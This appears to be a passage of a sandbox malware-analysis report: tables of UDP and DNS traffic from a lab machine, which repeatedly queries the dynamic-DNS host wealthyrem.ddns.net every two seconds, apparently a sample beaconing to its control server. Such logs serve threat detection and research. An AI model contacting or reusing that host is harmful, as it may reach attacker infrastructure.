Aug 3, 2021 19:07:28.773401976 CEST	53	53928	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:30.528975964 CEST	51058	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:30.567393064 CEST	53	51058	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:32.768989086 CEST	56711	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:32.802838087 CEST	53	56711	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:35.004992008 CEST	54780	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:35.040189981 CEST	53	54780	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:37.205674887 CEST	54305	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:37.239572048 CEST	53	54305	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:39.391149044 CEST	61669	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:39.415898085 CEST	53	61669	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:41.593108892 CEST	57336	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:41.625711918 CEST	53	57336	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:43.791191101 CEST	64577	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:43.823787928 CEST	53	64577	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:45.981834888 CEST	64987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:46.009243011 CEST	53	64987	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:48.208339930 CEST	58655	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:48.245440960 CEST	53	58655	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:50.405112028 CEST	60905	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:50.439282894 CEST	53	60905	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:52.700977087 CEST	62776	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:52.736202002 CEST	53	62776	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:54.903065920 CEST	56923	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:54.935384989 CEST	53	56923	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:57.106620073 CEST	65201	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:57.142123938 CEST	53	65201	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:59.292171955 CEST	54264	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:59.324852943 CEST	53	54264	8.8.8.8	192.168.2.3
Aug 3, 2021 19:08:01.496685028 CEST	58439	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:08:01.529334068 CEST	53	58439	8.8.8.8	192.168.2.3
Aug 3, 2021 19:08:03.698606014 CEST	54235	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:08:03.731192112 CEST	53	54235	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 19:01:32.114979982 CEST	192.168.2.3	8.8.8.8	0x4f55	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:34.315417051 CEST	192.168.2.3	8.8.8.8	0xc0f9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:36.516494036 CEST	192.168.2.3	8.8.8.8	0xb853	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:38.721241951 CEST	192.168.2.3	8.8.8.8	0x4c0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:40.908818960 CEST	192.168.2.3	8.8.8.8	0x8464	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:43.099242926 CEST	192.168.2.3	8.8.8.8	0x1298	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:45.284416914 CEST	192.168.2.3	8.8.8.8	0x2508	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:47.753312111 CEST	192.168.2.3	8.8.8.8	0x95dd	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:50.319245100 CEST	192.168.2.3	8.8.8.8	0x91d3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:52.518642902 CEST	192.168.2.3	8.8.8.8	0x3f8e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:54.722306013 CEST	192.168.2.3	8.8.8.8	0x64f4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:56.924621105 CEST	192.168.2.3	8.8.8.8	0x58e4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:59.130711079 CEST	192.168.2.3	8.8.8.8	0xae14	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:01.320058107 CEST	192.168.2.3	8.8.8.8	0x9d7b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:03.553585052 CEST	192.168.2.3	8.8.8.8	0xf106	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:07.920561075 CEST	192.168.2.3	8.8.8.8	0xcfbc	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:10.120966911 CEST	192.168.2.3	8.8.8.8	0xb28d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:12.344211102 CEST	192.168.2.3	8.8.8.8	0xf8d3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:14.686839104 CEST	192.168.2.3	8.8.8.8	0xabd4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:16.953767061 CEST	192.168.2.3	8.8.8.8	0x296	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:19.211441040 CEST	192.168.2.3	8.8.8.8	0x4268	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:21.429611921 CEST	192.168.2.3	8.8.8.8	0xb8c4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:23.626596928 CEST	192.168.2.3	8.8.8.8	0xd8c3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:25.812108994 CEST	192.168.2.3	8.8.8.8	0xe46d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:28.016876936 CEST	192.168.2.3	8.8.8.8	0xe1a4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:30.218873978 CEST	192.168.2.3	8.8.8.8	0x95e9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:32.420996904 CEST	192.168.2.3	8.8.8.8	0xef1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:34.679191113 CEST	192.168.2.3	8.8.8.8	0xb849	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:36.880808115 CEST	192.168.2.3	8.8.8.8	0x4e81	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:39.080692053 CEST	192.168.2.3	8.8.8.8	0xd3b6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:41.443295956 CEST	192.168.2.3	8.8.8.8	0x6608	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:43.643707991 CEST	192.168.2.3	8.8.8.8	0x7d7e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:45.850692987 CEST	192.168.2.3	8.8.8.8	0x8d99	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:48.038158894 CEST	192.168.2.3	8.8.8.8	0xbc7c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:50.265275955 CEST	192.168.2.3	8.8.8.8	0xf886	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:52.473217964 CEST	192.168.2.3	8.8.8.8	0xff	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:54.709424973 CEST	192.168.2.3	8.8.8.8	0x7c6b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:57.038458109 CEST	192.168.2.3	8.8.8.8	0xd11b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:00.213896036 CEST	192.168.2.3	8.8.8.8	0x8a1b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:02.430080891 CEST	192.168.2.3	8.8.8.8	0xa63	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:04.613842010 CEST	192.168.2.3	8.8.8.8	0x48fd	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:06.893040895 CEST	192.168.2.3	8.8.8.8	0x9167	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:09.084055901 CEST	192.168.2.3	8.8.8.8	0x62ed	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:11.271615028 CEST	192.168.2.3	8.8.8.8	0xf165	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:13.477817059 CEST	192.168.2.3	8.8.8.8	0x3d90	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:15.679207087 CEST	192.168.2.3	8.8.8.8	0xf3a8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:17.865520954 CEST	192.168.2.3	8.8.8.8	0x1e50	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:20.084985018 CEST	192.168.2.3	8.8.8.8	0xea4b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:22.322797060 CEST	192.168.2.3	8.8.8.8	0x9268	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:24.522763014 CEST	192.168.2.3	8.8.8.8	0x2dba	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:26.742661953 CEST	192.168.2.3	8.8.8.8	0xe4f0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:28.930773973 CEST	192.168.2.3	8.8.8.8	0xf843	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:31.135622978 CEST	192.168.2.3	8.8.8.8	0x7112	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:33.318119049 CEST	192.168.2.3	8.8.8.8	0x5739	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:35.511454105 CEST	192.168.2.3	8.8.8.8	0x752	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:37.775151014 CEST	192.168.2.3	8.8.8.8	0xa606	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:39.970947981 CEST	192.168.2.3	8.8.8.8	0x5794	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:42.164659977 CEST	192.168.2.3	8.8.8.8	0xc21d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:44.354120970 CEST	192.168.2.3	8.8.8.8	0x50ae	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:46.570506096 CEST	192.168.2.3	8.8.8.8	0xab70	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:48.773654938 CEST	192.168.2.3	8.8.8.8	0xf7a2	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:50.951783895 CEST	192.168.2.3	8.8.8.8	0xc7d0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:53.197990894 CEST	192.168.2.3	8.8.8.8	0x2ac8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:55.415544033 CEST	192.168.2.3	8.8.8.8	0xdb67	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:57.632731915 CEST	192.168.2.3	8.8.8.8	0x8876	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:59.824805975 CEST	192.168.2.3	8.8.8.8	0xdd4a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:02.424027920 CEST	192.168.2.3	8.8.8.8	0x40a4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:05.025619984 CEST	192.168.2.3	8.8.8.8	0xc20b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:07.243323088 CEST	192.168.2.3	8.8.8.8	0xe42a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:09.483490944 CEST	192.168.2.3	8.8.8.8	0xba28	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:11.765233040 CEST	192.168.2.3	8.8.8.8	0xddb0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:14.084388971 CEST	192.168.2.3	8.8.8.8	0xfeb0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:16.275333881 CEST	192.168.2.3	8.8.8.8	0xa694	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:18.478743076 CEST	192.168.2.3	8.8.8.8	0xa8c7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:20.698674917 CEST	192.168.2.3	8.8.8.8	0x5126	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:22.901813030 CEST	192.168.2.3	8.8.8.8	0xa630	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:25.226316929 CEST	192.168.2.3	8.8.8.8	0xf5b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:27.418201923 CEST	192.168.2.3	8.8.8.8	0xc235	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:29.614897013 CEST	192.168.2.3	8.8.8.8	0x7a7c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:31.996125937 CEST	192.168.2.3	8.8.8.8	0xd305	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:34.188719988 CEST	192.168.2.3	8.8.8.8	0x8c28	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:36.419224977 CEST	192.168.2.3	8.8.8.8	0x8a03	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:38.651132107 CEST	192.168.2.3	8.8.8.8	0x6df8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:40.952564955 CEST	192.168.2.3	8.8.8.8	0x5512	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:43.204242945 CEST	192.168.2.3	8.8.8.8	0x346e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:45.405143023 CEST	192.168.2.3	8.8.8.8	0xbe48	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:47.623676062 CEST	192.168.2.3	8.8.8.8	0x2dc6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:49.844846964 CEST	192.168.2.3	8.8.8.8	0x5442	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:52.075742960 CEST	192.168.2.3	8.8.8.8	0x907d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:54.286129951 CEST	192.168.2.3	8.8.8.8	0x3c36	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:56.573766947 CEST	192.168.2.3	8.8.8.8	0x68b3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:58.795171022 CEST	192.168.2.3	8.8.8.8	0x9bf3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:01.028712034 CEST	192.168.2.3	8.8.8.8	0x9486	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:03.249236107 CEST	192.168.2.3	8.8.8.8	0xed32	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:05.473995924 CEST	192.168.2.3	8.8.8.8	0x26d6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:07.687529087 CEST	192.168.2.3	8.8.8.8	0xef65	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:10.196857929 CEST	192.168.2.3	8.8.8.8	0x173b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:12.714188099 CEST	192.168.2.3	8.8.8.8	0x71dc	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:14.921039104 CEST	192.168.2.3	8.8.8.8	0xcd49	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:17.109873056 CEST	192.168.2.3	8.8.8.8	0x954d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:19.332648039 CEST	192.168.2.3	8.8.8.8	0x4205	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:21.520255089 CEST	192.168.2.3	8.8.8.8	0x8926	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:23.720985889 CEST	192.168.2.3	8.8.8.8	0x821	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:25.923397064 CEST	192.168.2.3	8.8.8.8	0x96ce	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:28.157883883 CEST	192.168.2.3	8.8.8.8	0x4e8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:30.346065044 CEST	192.168.2.3	8.8.8.8	0xa5e8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:32.537942886 CEST	192.168.2.3	8.8.8.8	0x555d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:34.719111919 CEST	192.168.2.3	8.8.8.8	0x5059	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:36.924958944 CEST	192.168.2.3	8.8.8.8	0x7b1b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:39.130440950 CEST	192.168.2.3	8.8.8.8	0x428e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:41.315402031 CEST	192.168.2.3	8.8.8.8	0x8b71	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:43.540107012 CEST	192.168.2.3	8.8.8.8	0x8af6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:45.754501104 CEST	192.168.2.3	8.8.8.8	0x86b1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:47.940515041 CEST	192.168.2.3	8.8.8.8	0x2a2a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:50.126950026 CEST	192.168.2.3	8.8.8.8	0x278f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:52.331804991 CEST	192.168.2.3	8.8.8.8	0x62f6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:54.534140110 CEST	192.168.2.3	8.8.8.8	0x9faf	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:56.720890045 CEST	192.168.2.3	8.8.8.8	0x7fcc	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:05:58.957617998 CEST	192.168.2.3	8.8.8.8	0x4bf7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:01.144287109 CEST	192.168.2.3	8.8.8.8	0xab5e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:03.333826065 CEST	192.168.2.3	8.8.8.8	0xc0e9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:05.550487041 CEST	192.168.2.3	8.8.8.8	0xc40d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:07.741825104 CEST	192.168.2.3	8.8.8.8	0x3c4c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:09.941957951 CEST	192.168.2.3	8.8.8.8	0xba84	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:12.149107933 CEST	192.168.2.3	8.8.8.8	0x71aa	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:15.198581934 CEST	192.168.2.3	8.8.8.8	0x1519	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:17.397550106 CEST	192.168.2.3	8.8.8.8	0x4316	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:19.587477922 CEST	192.168.2.3	8.8.8.8	0xd753	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:21.772907972 CEST	192.168.2.3	8.8.8.8	0x1990	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:23.959944010 CEST	192.168.2.3	8.8.8.8	0x3ede	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:26.166287899 CEST	192.168.2.3	8.8.8.8	0xe3a2	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:28.366338015 CEST	192.168.2.3	8.8.8.8	0x667	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:30.600789070 CEST	192.168.2.3	8.8.8.8	0xcc52	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:32.799395084 CEST	192.168.2.3	8.8.8.8	0xd900	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:34.995313883 CEST	192.168.2.3	8.8.8.8	0xe662	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:37.197623014 CEST	192.168.2.3	8.8.8.8	0x75a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:39.385412931 CEST	192.168.2.3	8.8.8.8	0xbb11	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:41.637833118 CEST	192.168.2.3	8.8.8.8	0x1152	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:43.841898918 CEST	192.168.2.3	8.8.8.8	0x997c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:46.065788031 CEST	192.168.2.3	8.8.8.8	0x8a48	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:48.259576082 CEST	192.168.2.3	8.8.8.8	0xc1c6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:50.478462934 CEST	192.168.2.3	8.8.8.8	0x75e3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:52.664053917 CEST	192.168.2.3	8.8.8.8	0xf2df	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:54.869762897 CEST	192.168.2.3	8.8.8.8	0x7414	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:57.063138962 CEST	192.168.2.3	8.8.8.8	0x5c6f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:06:59.274760008 CEST	192.168.2.3	8.8.8.8	0x25b1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:01.536617041 CEST	192.168.2.3	8.8.8.8	0xa7a9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:03.743144989 CEST	192.168.2.3	8.8.8.8	0x7bc4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:05.939706087 CEST	192.168.2.3	8.8.8.8	0xbda9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:08.149225950 CEST	192.168.2.3	8.8.8.8	0x106b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:10.377194881 CEST	192.168.2.3	8.8.8.8	0x458d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:12.588496923 CEST	192.168.2.3	8.8.8.8	0x33bc	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:14.790198088 CEST	192.168.2.3	8.8.8.8	0x57de	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:17.232678890 CEST	192.168.2.3	8.8.8.8	0x2f60	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:19.495464087 CEST	192.168.2.3	8.8.8.8	0x4f1a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:21.703489065 CEST	192.168.2.3	8.8.8.8	0xba29	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:23.890366077 CEST	192.168.2.3	8.8.8.8	0x412d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:26.093004942 CEST	192.168.2.3	8.8.8.8	0xee6f	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:28.307390928 CEST	192.168.2.3	8.8.8.8	0x2238	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:30.528975964 CEST	192.168.2.3	8.8.8.8	0x26fd	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:32.768989086 CEST	192.168.2.3	8.8.8.8	0x7e26	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:07:35.004992008 CEST	192.168.2.3	8.8.8.8	0xeb55	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
